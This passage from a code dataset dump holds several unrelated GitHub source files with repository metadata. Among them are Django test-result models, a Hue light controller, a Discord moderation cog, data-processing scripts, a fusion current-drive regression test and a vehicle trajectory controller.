on_delete=models.CASCADE, blank=True, null=True, default=None)\n test = models.ForeignKey(Test, blank=True, null=True, default=None, on_delete=models.CASCADE)\n total_mark = models.DecimalField(max_digits=3, decimal_places=0, default=2)\n\n created = models.DateTimeField(auto_now_add=True, auto_now=False, null=True)\n updated = models.DateTimeField(auto_now_add=False, auto_now=True, null=True)\n\n def __str__(self):\n return self.name.username\n\n class Meta:\n verbose_name = \"Результаты теста\"\n 
verbose_name_plural = \"Результаты тестов\"\n\n\nclass AnswerStudent(models.Model):\n name = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True, default=None)\n test = models.ForeignKey(Test, blank=True, null=True, default=None, on_delete=models.CASCADE)\n quest = models.ForeignKey(Question, blank=True, null=True, default=None, on_delete=models.CASCADE)\n answer = models.ForeignKey(Answer, blank=True, null=True, default=None, on_delete=models.CASCADE)\n status = models.BooleanField(null=False, blank=False, default=False)\n session_key = models.CharField(max_length=128, blank=True, null=True, default=None)\n\n def __str__(self):\n return self.name.username\n\n class Meta:\n verbose_name = \"Ответ студента\"\n verbose_name_plural = \"Ответы студентов\"\n","repo_name":"WebZ70/WebSystemsVer1","sub_path":"module_test/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15227853232","text":"import qhue\nimport sys\n\ndef add_args(parser):\n parser.add_argument('--hue-username', metavar='USERNAME', dest='hue_username', type=str,\n help='the username to use when connecting to the bridge')\n parser.add_argument('--hue-lights', metavar='ARRAY', dest='hue_lights', type=str, default=\"1\",\n help='the light(s) to change')\n\n\ndef get_target(args):\n if not args.hue_username and args.hue:\n print(\"Need to create the username\")\n from qhue import create_new_username\n username = create_new_username(args.hue)\n print(\"Add '--hue-username %s' to the command line and restart\" % username)\n sys.exit(0)\n print(\"Will control Philips Hue @ %s\" % args.hue)\n b = qhue.Bridge(args.hue, args.hue_username)\n lights = list(map(int, args.hue_lights.split(',')))\n def set_lights(inProgress, failed):\n bri = 127\n alert = \"select\"\n if not failed:\n hue = 25500\n else:\n hue = 0\n bri = 255\n if inProgress:\n alert = \"lselect\"\n #for light in lights:\n # b.lights[light].state(bri=bri//2, hue=hue, alert=\"none\")\n for light in lights:\n b.lights[light].state(bri=bri, hue=hue, alert=alert)\n return set_lights\n","repo_name":"rickardp/devops-buildlight","sub_path":"target_hue.py","file_name":"target_hue.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"1112368705","text":"from discord.ext import commands\nimport discord\nfrom discord.ext.commands import has_permissions\nfrom discord import ChannelType\n\nclass new(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.group()\n async def new(self, ctx):\n if ctx.subcommand_passed is None:\n await ctx.send('Proper Usage: `new [category/channel/role/thread]`')\n elif ctx.invoked_subcommand is None:\n await ctx.send('not an option')\n \n @new.command(name = 'category')\n @commands.guild_only()\n @has_permissions(manage_guild = True)\n async def new_category_subcommand(self, ctx, *, name: str = None):\n if name == None:\n await ctx.send('i need a name for the category')\n return\n \n try:\n category = await ctx.guild.create_category(name = name)\n await ctx.send(f'Category: `{category.name}` created!')\n except Exception:\n await ctx.send('you made an error somewhere')\n \n @new.command(name = 'channel')\n @commands.guild_only()\n @has_permissions(manage_channels = True)\n async def new_channel_subcommand(self, ctx, category: discord.CategoryChannel = None, *, name: str = None):\n if 
category == None:\n await ctx.send('give me a category to create the channel in')\n return\n\n if name == None:\n await ctx.send('i need a name for the channel')\n return\n\n try:\n channel = await ctx.guild.create_text_channel(name = name, category = category)\n await ctx.send(f'Channel: `{channel.name}` created!')\n except Exception:\n await ctx.send('you made an error somewhere')\n\n @new.command(name = 'role')\n @commands.guild_only()\n @has_permissions(manage_roles = True)\n async def new_role_subcommand(self, ctx, *, name: str = None):\n if name == None:\n await ctx.send('i need a name for this role')\n return\n\n try:\n await ctx.guild.create_role(name = name)\n await ctx.send(f'Role `{name}` created!')\n except Exception:\n await ctx.send('you made an error somewhere')\n\n @new.command(name = 'thread')\n @commands.guild_only()\n @has_permissions(create_public_threads = True, create_private_threads = True)\n async def new_thread_subcommand(self, ctx, channel: discord.TextChannel = None, *, name: str = None):\n if channel == None:\n await ctx.send('i need a channel to create a thread in')\n return\n \n if name == None:\n await ctx.send('i need a name for this thread')\n return\n \n await ctx.send('do you want a `private` or a `public` thread?')\n msg = await self.bot.wait_for('message', check = lambda m: m.author == ctx.author)\n\n if msg.content.lower() == 'public':\n try:\n await channel.create_thread(name = name, type = ChannelType.public_thread)\n await ctx.send(f'Thread `{name}` Created!')\n except Exception:\n await ctx.send('you made an error somewhere')\n elif msg.content.lower() == 'private':\n try:\n await channel.create_thread(name = name, type = ChannelType.private_thread)\n await ctx.send(f'Thread `{name}` Created!')\n except Exception:\n await ctx.send('you made an error somewhere')\n else:\n await ctx.send('that\\'s not an option')\n\n @new_category_subcommand.error\n async def new_category_subcommand_error(self, ctx, error):\n if isinstance(error, commands.MissingPermissions):\n await ctx.send('You don\\'t have the perm: `Manage Server`!')\n \n @new_channel_subcommand.error\n async def new_channel_subcommand_error(self, ctx, error):\n if isinstance(error, commands.MissingPermissions):\n await ctx.send('You don\\'t have the perm: `Manage Channels`!')\n if isinstance(error, commands.BadArgument):\n await ctx.send('that category is invalid')\n\n @new_role_subcommand.error\n async def new_role_subcommand_error(self, ctx, error):\n if isinstance(error, commands.MissingPermissions):\n await ctx.send('You don\\'t have the perm: `Manage Roles`!')\n\n @new_thread_subcommand.error\n async def new_thread_subcommand_error(self, ctx, error):\n if isinstance(error, commands.MissingPermissions):\n await ctx.send('You don\\'t have either the `Create Public Threads` or `Create Private Threads` Perm!')\n if isinstance(error, commands.BadArgument):\n await ctx.send('that channel is invalid')\n \n\nasync def setup(bot):\n await bot.add_cog(new(bot))\n","repo_name":"rushil534/mrmorale","sub_path":"moderation/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"33094066583","text":"import operator\nimport sys\nimport glob\nimport json\nfrom collections import defaultdict\n\nlibrary=sys.argv[1]\ndata_location=\"../../output/%s/*.json\" % library\n\ncounting=defaultdict(int)\n\nfor f in glob.glob(data_location):\n\twith open(f, 'r') as myfile:\n\t\tfor line in 
myfile:\n\t\t\tj=json.loads(line)\n\t\t\tif len(j['untagged']):\n\t\t\t\tfor k in j['untagged']:\n\t\t\t\t\tcounting[k]+=j['untagged'][k]\nsorted_counts = sorted(counting.items(), key=operator.itemgetter(1), reverse=True)\n\nprint(sorted_counts[:10])\n","repo_name":"filievski/LODLanguages","sub_path":"make_paper_tables/third_submission/create_table_7.py","file_name":"create_table_7.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73322474875","text":"import pandas as pd\n\nfile = pd.read_csv(\"../data/autos.csv\", sep=\";\")\nfile2 = file.drop_duplicates(['price'])\nfile2 = pd.DataFrame(file2, columns=['price'])\nfile2.to_csv('../data/price.txt', sep=';', index=False, header=False)\n\nfile3 = file.drop_duplicates(['kilometer']) \nfile3 = pd.DataFrame(file3, columns=['kilometer'])\nfile3.to_csv('../data/kilometer.txt', sep=';', index=False, header=False)\n","repo_name":"gitdriss/MergeAndSortAppInCuda","sub_path":"script/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15609521144","text":"import os\nimport magic\n\n# Set the path to the directory containing the images\npath = \"decrypted_nsfw\"\n\n# Create a new directory to store the renamed images\nnew_dir = os.path.join(path, \"new\")\nif not os.path.exists(new_dir):\n os.mkdir(new_dir)\n\n# Get a list of all files in the directory\nfiles = os.listdir(path)\n\n# Initialize the magic library to detect file types\nmime = magic.Magic(mime=True)\n\n# Loop through each file in the directory\nfor file in files:\n # Check if the current item is a file and an image\n file_path = os.path.join(path, file)\n if os.path.isfile(file_path) and \"image\" in mime.from_file(file_path):\n # Determine the file type based on the file header\n file_type = mime.from_file(file_path).split(\"/\")[1]\n # Rename the file with the appropriate file extension\n new_name = f\"{os.path.splitext(file)[0]}.{file_type}\"\n os.rename(file_path, os.path.join(new_dir, new_name))\n\n","repo_name":"inferno0230/ganyu_collection","sub_path":"extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70517446396","text":"import torch\n\n\ndef _get_matcher(targets, labels):\n \"\"\"Returns a boolean tensor.\"\"\"\n matcher = torch.eq(targets.unsqueeze(dim=1), labels)\n if labels.ndim == 2:\n # if the labels are one-hot vectors\n num_classes = targets.size()[1]\n matcher = torch.eq(torch.sum(matcher, dim=-1), num_classes)\n return matcher\n\n\ndef error_type_determination(\n distances,\n target_labels,\n prototype_labels,\n theta_boundary,\n):\n matcher = _get_matcher(target_labels, prototype_labels)\n not_matcher = torch.bitwise_not(matcher)\n\n d_tilde = distances - theta_boundary\n\n is_in_bound = d_tilde < 0\n is_out_of_bound = d_tilde >= 0\n\n tp = torch.logical_and(is_in_bound, matcher)\n fn = torch.logical_and(is_out_of_bound, matcher)\n tn = torch.logical_and(is_out_of_bound, not_matcher)\n fp = torch.logical_and(is_in_bound, not_matcher)\n\n return tp, tn, fp, fn\n\n\ndef csi_score(tpLoss, tnLoss, fpLoss, fnLoss):\n csi = (tpLoss) / (fnLoss + fpLoss + tpLoss)\n return csi\n\n\ndef ppcr_score(tpLoss, tnLoss, fpLoss, fnLoss):\n ppcr = (tpLoss + fpLoss) / (tpLoss + fpLoss + tnLoss + fnLoss)\n return 
ppcr\n\n\ndef prob_contrastive_score(tpLoss, tnLoss, fpLoss, fnLoss):\n pcs = tpLoss - fpLoss\n return pcs\n\n\ndef test_score(tpLoss, tnLoss, fpLoss, fnLoss):\n test = (fpLoss + fnLoss)\n return -test\n\n\ndef accuracy_score(tpLoss, tnLoss, fpLoss, fnLoss):\n accuracy = (tpLoss + tnLoss) / (tpLoss + tnLoss + fpLoss + fnLoss)\n return accuracy\n\n\nSCORES = {\n \"csi\": csi_score,\n \"ppcr\": ppcr_score,\n \"accuracy\": accuracy_score,\n \"test1\": test_score,\n \"pcs\": prob_contrastive_score,\n}\n\n\ndef get_scores(score, tpLoss, tnLoss, fpLoss, fnLoss):\n\n if score not in SCORES:\n raise ValueError(\n f\"Unknown distribution {score} for distribution_handler, choose from {list(SCORES.keys())}\"\n )\n\n return SCORES[score](tpLoss, tnLoss, fpLoss, fnLoss)\n","repo_name":"danielstaps/SupervisedVectorQuantizationOCC","sub_path":"prototorch_oneclass/functions/confusion.py","file_name":"confusion.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5492805007","text":"import pytest\nfrom typing import NamedTuple, Any\n\n\nfrom process.fortran import (\n current_drive_variables,\n cost_variables,\n physics_variables,\n heat_transport_variables,\n)\nfrom process.current_drive import CurrentDrive\n\n\n@pytest.fixture\ndef current_drive():\n \"\"\"Provides CurrentDrive object for testing.\n\n :returns current_drive: initialised CurrentDrive object\n :rtype: process.current_drive.CurrentDrive\n \"\"\"\n return CurrentDrive()\n\n\nclass CudrivParam(NamedTuple):\n pinjwpfix: Any = None\n\n pinjwp: Any = None\n\n echpwr: Any = None\n\n pnbeam: Any = None\n\n plhybd: Any = None\n\n cnbeam: Any = None\n\n porbitlossmw: Any = None\n\n iefrf: Any = None\n\n iefrffix: Any = None\n\n pheat: Any = None\n\n pheatfix: Any = None\n\n pinjfixmw: Any = None\n\n irfcd: Any = None\n\n feffcd: Any = None\n\n fpion: Any = None\n\n nbshinef: Any = None\n\n gamcd: Any = None\n\n gamma_ecrh: Any = None\n\n etalh: Any = None\n\n etacd: Any = None\n\n etacdfix: Any = None\n\n etaech: Any = None\n\n forbitloss: Any = None\n\n pinjmw: Any = None\n\n pwpnb: Any = None\n\n etanbi: Any = None\n\n enbeam: Any = None\n\n effcd: Any = None\n\n pwplh: Any = None\n\n echwpow: Any = None\n\n pnbitot: Any = None\n\n nbshinemw: Any = None\n\n pinjemw: Any = None\n\n pinjimw: Any = None\n\n bigq: Any = None\n\n bootipf: Any = None\n\n bscfmax: Any = None\n\n taubeam: Any = None\n\n pinjalw: Any = None\n\n nbshield: Any = None\n\n frbeam: Any = None\n\n rtanbeam: Any = None\n\n rtanmax: Any = None\n\n diaipf: Any = None\n\n psipf: Any = None\n\n plasipf: Any = None\n\n harnum: Any = None\n\n xi_ebw: Any = None\n\n dene: Any = None\n\n te: Any = None\n\n rmajor: Any = None\n\n ten: Any = None\n\n zeff: Any = None\n\n dlamee: Any = None\n\n beta: Any = None\n\n rhopedt: Any = None\n\n rhopedn: Any = None\n\n te0: Any = None\n\n teped: Any = None\n\n tesep: Any = None\n\n alphat: Any = None\n\n alphan: Any = None\n\n ne0: Any = None\n\n nesep: Any = None\n\n neped: Any = None\n\n bt: Any = None\n\n rminor: Any = None\n\n tbeta: Any = None\n\n plascur: Any = None\n\n ipedestal: Any = None\n\n faccd: Any = None\n\n ignite: Any = None\n\n pohmmw: Any = None\n\n powfmw: Any = None\n\n facoh: Any = None\n\n fvsbrnni: Any = None\n\n startupratio: Any = None\n\n iprint: Any = None\n\n outfile: Any = None\n\n expected_pinjwp: Any = None\n\n expected_echpwr: Any = None\n\n expected_gamcd: Any = None\n\n expected_etacd: Any = None\n\n 
expected_pinjmw: Any = None\n\n expected_effcd: Any = None\n\n expected_echwpow: Any = None\n\n expected_pinjemw: Any = None\n\n expected_bigq: Any = None\n\n\n@pytest.mark.parametrize(\n \"cudrivparam\",\n (\n CudrivParam(\n pinjwpfix=0,\n pinjwp=0,\n echpwr=0,\n pnbeam=0,\n plhybd=0,\n cnbeam=0,\n porbitlossmw=0,\n iefrf=10,\n iefrffix=0,\n pheat=75,\n pheatfix=0,\n pinjfixmw=0,\n irfcd=1,\n feffcd=1,\n fpion=0.5,\n nbshinef=0,\n gamcd=0,\n gamma_ecrh=0.30000000000000004,\n etalh=0.29999999999999999,\n etacd=0,\n etacdfix=0,\n etaech=0.5,\n forbitloss=0,\n pinjmw=0,\n pwpnb=0,\n etanbi=0.29999999999999999,\n enbeam=1000,\n effcd=0,\n pwplh=0,\n echwpow=0,\n pnbitot=0,\n nbshinemw=0,\n pinjemw=0,\n pinjimw=0,\n bigq=0,\n bootipf=0.27635918746616817,\n bscfmax=0.95000000000000007,\n taubeam=0,\n pinjalw=200,\n nbshield=0.5,\n frbeam=1.05,\n rtanbeam=0,\n rtanmax=0,\n diaipf=0,\n psipf=0,\n plasipf=0.27635918746616817,\n harnum=1,\n xi_ebw=0.80000000000000004,\n dene=7.5e19,\n te=12,\n rmajor=8,\n ten=12.626131115905864,\n zeff=2.0909945616489103,\n dlamee=17.510652035055571,\n beta=0.030000000000000006,\n rhopedt=0.94000000000000006,\n rhopedn=0.94000000000000006,\n te0=24.402321098330372,\n teped=5.5,\n tesep=0.10000000000000001,\n alphat=1.45,\n alphan=1,\n ne0=8.515060981068918e19,\n nesep=4.1177885154594193e19,\n neped=7.000240476281013e19,\n bt=5.7000000000000002,\n rminor=2.6666666666666665,\n tbeta=2,\n plascur=18398455.678867526,\n ipedestal=1,\n faccd=0.12364081253383186,\n ignite=0,\n pohmmw=0,\n powfmw=0,\n facoh=0.59999999999999998,\n fvsbrnni=0.40000000000000002,\n startupratio=1,\n iprint=0,\n outfile=11,\n expected_pinjwp=240.99200038011492,\n expected_echpwr=120.49600019005746,\n expected_gamcd=0.30000000000000004,\n expected_etacd=0.5,\n expected_pinjmw=120.49600019005746,\n expected_effcd=0.05000000000000001,\n expected_echwpow=240.99200038011492,\n expected_pinjemw=120.49600019005746,\n expected_bigq=0,\n ),\n CudrivParam(\n pinjwpfix=0,\n pinjwp=240.99200038011492,\n echpwr=120.49600019005746,\n pnbeam=0,\n plhybd=0,\n cnbeam=0,\n porbitlossmw=0,\n iefrf=10,\n iefrffix=0,\n pheat=75,\n pheatfix=0,\n pinjfixmw=0,\n irfcd=1,\n feffcd=1,\n fpion=0.5,\n nbshinef=0,\n gamcd=0.30000000000000004,\n gamma_ecrh=0.30000000000000004,\n etalh=0.29999999999999999,\n etacd=0.5,\n etacdfix=0,\n etaech=0.5,\n forbitloss=0,\n pinjmw=120.49600019005746,\n pwpnb=0,\n etanbi=0.29999999999999999,\n enbeam=1000,\n effcd=0.05000000000000001,\n pwplh=0,\n echwpow=240.99200038011492,\n pnbitot=0,\n nbshinemw=0,\n pinjemw=120.49600019005746,\n pinjimw=0,\n bigq=0,\n bootipf=0.27635918746616817,\n bscfmax=0.95000000000000007,\n taubeam=0,\n pinjalw=200,\n nbshield=0.5,\n frbeam=1.05,\n rtanbeam=8.4000000000000004,\n rtanmax=13.179564451855533,\n diaipf=0,\n psipf=0,\n plasipf=0.27635918746616817,\n harnum=1,\n xi_ebw=0.80000000000000004,\n dene=7.5e19,\n te=12,\n rmajor=8,\n ten=12.626131115905864,\n zeff=2.0909945616489103,\n dlamee=17.510652035055571,\n beta=0.030000000000000006,\n rhopedt=0.94000000000000006,\n rhopedn=0.94000000000000006,\n te0=24.402321098330372,\n teped=5.5,\n tesep=0.10000000000000001,\n alphat=1.45,\n alphan=1,\n ne0=8.515060981068918e19,\n nesep=4.1177885154594193e19,\n neped=7.000240476281013e19,\n bt=5.7000000000000002,\n rminor=2.6666666666666665,\n tbeta=2,\n plascur=18398455.678867526,\n ipedestal=1,\n faccd=0.12364081253383186,\n ignite=0,\n pohmmw=0.76707314489379119,\n powfmw=1051.6562748933977,\n facoh=0.59999999999999998,\n fvsbrnni=0.40000000000000002,\n 
startupratio=1,\n iprint=0,\n outfile=11,\n expected_pinjwp=240.99200038011492,\n expected_echpwr=120.49600019005746,\n expected_gamcd=0.30000000000000004,\n expected_etacd=0.5,\n expected_pinjmw=120.49600019005746,\n expected_effcd=0.05000000000000001,\n expected_echwpow=240.99200038011492,\n expected_pinjemw=120.49600019005746,\n expected_bigq=8.6725187311435423,\n ),\n ),\n)\ndef test_cudriv(cudrivparam, monkeypatch, current_drive):\n \"\"\"\n Automatically generated Regression Unit Test for cudriv.\n\n This test was generated using data from tests/regression/scenarios/large-tokamak/IN.DAT.\n\n :param cudrivparam: the data used to mock and assert in this test.\n :type cudrivparam: cudrivparam\n\n :param monkeypatch: pytest fixture used to mock module/class variables\n :type monkeypatch: _pytest.monkeypatch.monkeypatch\n \"\"\"\n\n monkeypatch.setattr(heat_transport_variables, \"pinjwpfix\", cudrivparam.pinjwpfix)\n\n monkeypatch.setattr(heat_transport_variables, \"pinjwp\", cudrivparam.pinjwp)\n\n monkeypatch.setattr(current_drive_variables, \"echpwr\", cudrivparam.echpwr)\n\n monkeypatch.setattr(current_drive_variables, \"pnbeam\", cudrivparam.pnbeam)\n\n monkeypatch.setattr(current_drive_variables, \"plhybd\", cudrivparam.plhybd)\n\n monkeypatch.setattr(current_drive_variables, \"cnbeam\", cudrivparam.cnbeam)\n\n monkeypatch.setattr(\n current_drive_variables, \"porbitlossmw\", cudrivparam.porbitlossmw\n )\n\n monkeypatch.setattr(current_drive_variables, \"iefrf\", cudrivparam.iefrf)\n\n monkeypatch.setattr(current_drive_variables, \"iefrffix\", cudrivparam.iefrffix)\n\n monkeypatch.setattr(current_drive_variables, \"pheat\", cudrivparam.pheat)\n\n monkeypatch.setattr(current_drive_variables, \"pheatfix\", cudrivparam.pheatfix)\n\n monkeypatch.setattr(current_drive_variables, \"pinjfixmw\", cudrivparam.pinjfixmw)\n\n monkeypatch.setattr(current_drive_variables, \"irfcd\", cudrivparam.irfcd)\n\n monkeypatch.setattr(current_drive_variables, \"feffcd\", cudrivparam.feffcd)\n\n monkeypatch.setattr(current_drive_variables, \"fpion\", cudrivparam.fpion)\n\n monkeypatch.setattr(current_drive_variables, \"nbshinef\", cudrivparam.nbshinef)\n\n monkeypatch.setattr(current_drive_variables, \"gamcd\", cudrivparam.gamcd)\n\n monkeypatch.setattr(current_drive_variables, \"gamma_ecrh\", cudrivparam.gamma_ecrh)\n\n monkeypatch.setattr(current_drive_variables, \"etalh\", cudrivparam.etalh)\n\n monkeypatch.setattr(current_drive_variables, \"etacd\", cudrivparam.etacd)\n\n monkeypatch.setattr(current_drive_variables, \"etacdfix\", cudrivparam.etacdfix)\n\n monkeypatch.setattr(current_drive_variables, \"etaech\", cudrivparam.etaech)\n\n monkeypatch.setattr(current_drive_variables, \"forbitloss\", cudrivparam.forbitloss)\n\n monkeypatch.setattr(current_drive_variables, \"pinjmw\", cudrivparam.pinjmw)\n\n monkeypatch.setattr(current_drive_variables, \"pwpnb\", cudrivparam.pwpnb)\n\n monkeypatch.setattr(current_drive_variables, \"etanbi\", cudrivparam.etanbi)\n\n monkeypatch.setattr(current_drive_variables, \"enbeam\", cudrivparam.enbeam)\n\n monkeypatch.setattr(current_drive_variables, \"effcd\", cudrivparam.effcd)\n\n monkeypatch.setattr(current_drive_variables, \"pwplh\", cudrivparam.pwplh)\n\n monkeypatch.setattr(current_drive_variables, \"echwpow\", cudrivparam.echwpow)\n\n monkeypatch.setattr(current_drive_variables, \"pnbitot\", cudrivparam.pnbitot)\n\n monkeypatch.setattr(current_drive_variables, \"nbshinemw\", cudrivparam.nbshinemw)\n\n monkeypatch.setattr(current_drive_variables, \"pinjemw\", 
cudrivparam.pinjemw)\n\n monkeypatch.setattr(current_drive_variables, \"pinjimw\", cudrivparam.pinjimw)\n\n monkeypatch.setattr(current_drive_variables, \"bigq\", cudrivparam.bigq)\n\n monkeypatch.setattr(current_drive_variables, \"bootipf\", cudrivparam.bootipf)\n\n monkeypatch.setattr(current_drive_variables, \"bscfmax\", cudrivparam.bscfmax)\n\n monkeypatch.setattr(current_drive_variables, \"taubeam\", cudrivparam.taubeam)\n\n monkeypatch.setattr(current_drive_variables, \"pinjalw\", cudrivparam.pinjalw)\n\n monkeypatch.setattr(current_drive_variables, \"nbshield\", cudrivparam.nbshield)\n\n monkeypatch.setattr(current_drive_variables, \"frbeam\", cudrivparam.frbeam)\n\n monkeypatch.setattr(current_drive_variables, \"rtanbeam\", cudrivparam.rtanbeam)\n\n monkeypatch.setattr(current_drive_variables, \"rtanmax\", cudrivparam.rtanmax)\n\n monkeypatch.setattr(current_drive_variables, \"diaipf\", cudrivparam.diaipf)\n\n monkeypatch.setattr(current_drive_variables, \"psipf\", cudrivparam.psipf)\n\n monkeypatch.setattr(current_drive_variables, \"plasipf\", cudrivparam.plasipf)\n\n monkeypatch.setattr(current_drive_variables, \"harnum\", cudrivparam.harnum)\n\n monkeypatch.setattr(current_drive_variables, \"xi_ebw\", cudrivparam.xi_ebw)\n\n monkeypatch.setattr(physics_variables, \"dene\", cudrivparam.dene)\n\n monkeypatch.setattr(physics_variables, \"te\", cudrivparam.te)\n\n monkeypatch.setattr(physics_variables, \"rmajor\", cudrivparam.rmajor)\n\n monkeypatch.setattr(physics_variables, \"ten\", cudrivparam.ten)\n\n monkeypatch.setattr(physics_variables, \"zeff\", cudrivparam.zeff)\n\n monkeypatch.setattr(physics_variables, \"dlamee\", cudrivparam.dlamee)\n\n monkeypatch.setattr(physics_variables, \"beta\", cudrivparam.beta)\n\n monkeypatch.setattr(physics_variables, \"rhopedt\", cudrivparam.rhopedt)\n\n monkeypatch.setattr(physics_variables, \"rhopedn\", cudrivparam.rhopedn)\n\n monkeypatch.setattr(physics_variables, \"te0\", cudrivparam.te0)\n\n monkeypatch.setattr(physics_variables, \"teped\", cudrivparam.teped)\n\n monkeypatch.setattr(physics_variables, \"tesep\", cudrivparam.tesep)\n\n monkeypatch.setattr(physics_variables, \"alphat\", cudrivparam.alphat)\n\n monkeypatch.setattr(physics_variables, \"alphan\", cudrivparam.alphan)\n\n monkeypatch.setattr(physics_variables, \"ne0\", cudrivparam.ne0)\n\n monkeypatch.setattr(physics_variables, \"nesep\", cudrivparam.nesep)\n\n monkeypatch.setattr(physics_variables, \"neped\", cudrivparam.neped)\n\n monkeypatch.setattr(physics_variables, \"bt\", cudrivparam.bt)\n\n monkeypatch.setattr(physics_variables, \"rminor\", cudrivparam.rminor)\n\n monkeypatch.setattr(physics_variables, \"tbeta\", cudrivparam.tbeta)\n\n monkeypatch.setattr(physics_variables, \"plascur\", cudrivparam.plascur)\n\n monkeypatch.setattr(physics_variables, \"ipedestal\", cudrivparam.ipedestal)\n\n monkeypatch.setattr(physics_variables, \"faccd\", cudrivparam.faccd)\n\n monkeypatch.setattr(physics_variables, \"ignite\", cudrivparam.ignite)\n\n monkeypatch.setattr(physics_variables, \"pohmmw\", cudrivparam.pohmmw)\n\n monkeypatch.setattr(physics_variables, \"powfmw\", cudrivparam.powfmw)\n\n monkeypatch.setattr(physics_variables, \"facoh\", cudrivparam.facoh)\n\n monkeypatch.setattr(physics_variables, \"fvsbrnni\", cudrivparam.fvsbrnni)\n\n monkeypatch.setattr(cost_variables, \"startupratio\", cudrivparam.startupratio)\n\n current_drive.cudriv(output=False)\n\n assert heat_transport_variables.pinjwp == pytest.approx(cudrivparam.expected_pinjwp)\n\n assert 
current_drive_variables.echpwr == pytest.approx(cudrivparam.expected_echpwr)\n\n assert current_drive_variables.gamcd == pytest.approx(cudrivparam.expected_gamcd)\n\n assert current_drive_variables.etacd == pytest.approx(cudrivparam.expected_etacd)\n\n assert current_drive_variables.pinjmw == pytest.approx(cudrivparam.expected_pinjmw)\n\n assert current_drive_variables.effcd == pytest.approx(cudrivparam.expected_effcd)\n\n assert current_drive_variables.echwpow == pytest.approx(\n cudrivparam.expected_echwpow\n )\n\n assert current_drive_variables.pinjemw == pytest.approx(\n cudrivparam.expected_pinjemw\n )\n\n assert current_drive_variables.bigq == pytest.approx(cudrivparam.expected_bigq)\n\n\ndef test_sigbeam(current_drive):\n assert current_drive.sigbeam(\n 1e3, 13.07, 8.0e-1, 0.1, 1e-4, 1e-4, 1e-4\n ) == pytest.approx(2.013589662302492e-11)\n","repo_name":"ukaea/PROCESS","sub_path":"tests/unit/test_current_drive.py","file_name":"test_current_drive.py","file_ext":"py","file_size_in_byte":15787,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"96"} +{"seq_id":"4309586986","text":"# Fill in the respective functions to implement the controller\n\n# Import libraries\nimport numpy as np\nfrom base_controller import BaseController\nfrom scipy import signal, linalg\nfrom util import *\nimport math\nfrom scipy.ndimage import gaussian_filter1d\n\n# CustomController class (inherits from BaseController)\nclass CustomController(BaseController):\n\n def __init__(self, trajectory):\n\n super().__init__(trajectory)\n\n # Define constants\n # These can be ignored in P1\n self.lr = 1.39\n self.lf = 1.55\n self.Ca = 20000\n self.Iz = 25854\n self.m = 1888.6\n self.g = 9.81\n\n # Add additional member variables according to your need here.\n \n self.previous_error_kp = 0\n self.error_ki = 0\n self.previous_delta = 0\n \n self.kp = 400\n self.ki = 8\n self.kd = -0.01\n self.error_dis = 0\n \n \n self.curve = self.computeCurvature()\n def computeCurvature(self):\n # Function to compute and return the curvature of a trajectory.\n sigmaGauss = 5 # We can change this value to increase filter strength\n trajectory = self.trajectory\n xp = gaussian_filter1d(input=trajectory[:,0],sigma=sigmaGauss,order=1)\n xpp = gaussian_filter1d(input=trajectory[:,0],sigma=sigmaGauss,order=2)\n yp = gaussian_filter1d(input=trajectory[:,1],sigma=sigmaGauss,order=1)\n ypp = gaussian_filter1d(input=trajectory[:,1],sigma=sigmaGauss,order=2)\n curve = np.zeros(len(trajectory))\n for i in range(len(xp)):\n curve[i] = (xp[i]*ypp[i] - yp[i]*xpp[i])/(xp[i]**2 + yp[i]**2)**1.5\n \n return curve\n\n def update(self, timestep):\n\n trajectory = self.trajectory\n\n lr = self.lr\n lf = self.lf\n Ca = self.Ca\n Iz = self.Iz\n m = self.m\n g = self.g\n\n\n\n kp = self.kp\n ki = self.ki\n kd = self.kd\n \n \n # Fetch the states from the BaseController method\n delT, X, Y, xdot, ydot, psi, psidot = super().getStates(timestep)\n \n \n \n dis, ind = closestNode(X,Y,trajectory)\n jia = 0\n if ind < len(trajectory) - 100:\n jia = 100\n else:\n jia = len(trajectory) - ind - 1\n \n if ind < len(trajectory) - 150:\n lakua = 150\n else:\n lakua = len(trajectory) - ind - 1\n \n X_desired = trajectory[ind + jia,0]\n Y_desired = trajectory[ind + jia,1]\n \n X_curv = trajectory[ind + lakua,0]\n Y_curv = trajectory[ind + lakua,1]\n \n X_pre = trajectory[ind,0]\n Y_pre = trajectory[ind,1]\n psi_desired = np.arctan2(Y_desired - Y_pre, X_desired - X_pre)\n psi_curv = np.arctan2(Y_curv - Y_pre, X_curv - X_pre)\n # 
